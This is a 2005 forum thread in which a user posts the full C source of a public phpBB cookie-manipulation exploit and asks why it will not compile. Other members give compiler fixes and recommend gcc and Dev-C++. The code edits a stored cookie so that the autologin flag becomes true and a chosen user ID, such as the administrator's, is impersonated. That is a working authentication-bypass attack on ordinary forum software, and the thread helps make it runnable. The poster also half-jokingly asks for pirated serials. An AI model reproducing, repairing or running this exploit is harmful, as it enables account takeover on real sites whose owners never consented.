C compiling problems.

Printable View

March 22nd, 2005, 12:43 AM
The_Messiah

C compiling problems.

Ok, I pretty much don't know anything about programming, but I am trying to compile this phpbb exploit to test out my servers. This is the code, it is public knowledge.

Below the code is the error message I get.
================================================== ==
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char** argv[]) {
FILE *pointer;
char contenido[10000],

cookie[91]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0
%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22",
cookief[9]="%22%3B%7D", cookiec[106],

cookie_false[92]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb
%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7 D",
*pos;
int p=0, i=0;

if (argc!=2) {
printf("Usage: phpbb_exploit.exe user_id\n\n");
exit(0);
}
pointer=fopen("cookies.txt", "r");

if (pointer) {
fread(contenido, 300, 10, pointer);
fclose(pointer);
} else {
printf("The file can't be open\n");
exit(0);
}

strcpy(cookiec, cookie);
strncat(cookiec, argv[1], 6);
strcat(cookiec, cookief);

if (pos=strstr(contenido, cookiec)) {
p=pos - contenido;
while (i<92) {
if (cookie_false[i]!=NULL)
contenido[p]=cookie_false[i];
p++;
i++;
}
}
else {
printf("The file cookies.txt isn't valid for execute the
exploit or the user id is incorrect\n");
exit(0);
}

if (pointer=fopen("cookies.txt", "w")) {
fputs(contenido, pointer);
printf("Cookie modified: \n\n%s\n\n", contenido);
printf("The cookies file has overwriten... looks like the exploit has worked");
} else printf("\n\nThe file cookies.txt has not write permissions.");
return 0;
}
================================================== ====

And this is the error I get when I try to compile

================================================== ======

Miracle C Compiler (r3.2), written by bts.
line 28: String crosses a line: a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0

line 29: String crosses a line: ,

line 32: String crosses a line: a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb

line 33: String crosses a line: ,

line 65: String crosses a line: The file cookies.txt isn't valid for execute the

line 66: String crosses a line: );

Compiling c:\documents and settings\root\desktop\phpbbsploit.c
main

c:\documents and settings\root\desktop\phpbbsploit.c: line 26: too many locals declared
'char contenido[10000], cookie[91]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0" %3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22"," cookief[9]="%22%3B%7D", cookiec[106], cookie_false[92]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb" %3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7 D"," *pos'
aborting compile
================================================== =======

Any help with what's going on would be greatly appreciated.

Edit: I'm using windows xp pro, and Miracle C workbench,which I found at www.download.com
March 22nd, 2005, 01:18 AM
gothic_type

In C, when a string goes over multiple lines, you have to show that it is continuing. I believe you do this by putting a \ character at the end of each line. If that doesn't work, then you could just move it all onto the one line (the part in between the quotes).

Also, when you're posting code, you should use the code tags ([ code] and [ /code] without the spaces).

ac
March 22nd, 2005, 03:14 AM
The_Messiah

Ok, now the only error I'm getting is this.

C:\Documents and Settings\root\Desktop\exploit.c: line 7: too many locals declared
'char contenido[10000], cookie[91]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0 %3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22", cookief[9]="%22%3B%7D", cookiec[106], cookie_false[92]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb %3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", *pos'
aborting compile

What to do about that?
March 22nd, 2005, 12:54 PM
zENGER

Try splitting them up into their own statements instead of declaring them all at once. Your compiler might have a limitation of what it can do at once.

ie

Code:

char contenido[10000]; char cookie[91]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0 %3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22"; char cookief[9]="%22%3B%7D"; char cookiec[106]; char cookie_false[92]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb %3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D" char *pos;

If nothing else, this will narrow down the error.
March 22nd, 2005, 07:10 PM
The_Messiah

Ok we're getting somewhere, now this is what I get.

C:\Documents and Settings\root\Desktop\exploit.c: line 7: too many locals declared
'char contenido[10000]'
aborting compile
March 22nd, 2005, 07:13 PM
zENGER

What compiler are you using? Not all compileres are built the same. Looks like the array is too big. It has to allocate 10000 char storage units on the stack for that to work. I'm betting there is some built-in or configurable option that limit the size.
March 22nd, 2005, 07:21 PM
The_Messiah

I'm using Miracle C workbench,which I found at www.download.com

Maybe someone could recomend a better one (that's free...or has serials available >:-) )

I'd prefer one with a gui frontend, but I can work with command line, with a little help.
March 22nd, 2005, 07:36 PM
zENGER

Only one I compile stuff with is gnu gcc, which is free, but I use the linux version and its command line based. I know there is supposed to be a windows version out so you might look into that.
March 28th, 2005, 06:20 PM
gothic_type

If you download Dev-C++ from www.bloodshed.net it comes with a windows port of gcc (mingw32). Dev-C++ is itself an IDE (Integrated Development Environment) i.e. a GUI frontend like you were asking for.

ac
April 9th, 2005, 07:23 PM
cntfind80

I also recomend Dev-C++ (mingw) it has served me well. As you learn more about C/C++ you can begin to use the advanced features of Dev-C++ and perhaps setup your own custom mingw enviroment.